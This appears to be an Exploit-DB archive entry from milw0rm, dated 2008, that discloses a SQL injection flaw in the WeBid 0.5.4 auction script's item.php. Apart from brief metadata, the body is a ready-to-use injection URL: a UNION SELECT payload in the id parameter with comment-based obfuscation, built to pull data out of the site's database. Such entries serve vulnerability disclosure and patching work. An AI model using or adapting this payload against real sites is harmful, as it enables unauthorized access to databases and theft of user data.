WeBid 0.5.4 - 'item.php' SQL Injection

EDB-ID:

6341


Author:

Stack

Type:

webapps


Platform:

PHP

Date:

2008-09-01


Application :: WeBid v0.5.4  sql injection vuln
Download :: http://www.sourceforge.net/projects/simpleauction
Found By ::Stack
http://www.site.il/item.php?id=-1/**/UNION/**/SELECT/**/1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32/*

# milw0rm.com [2008-09-01]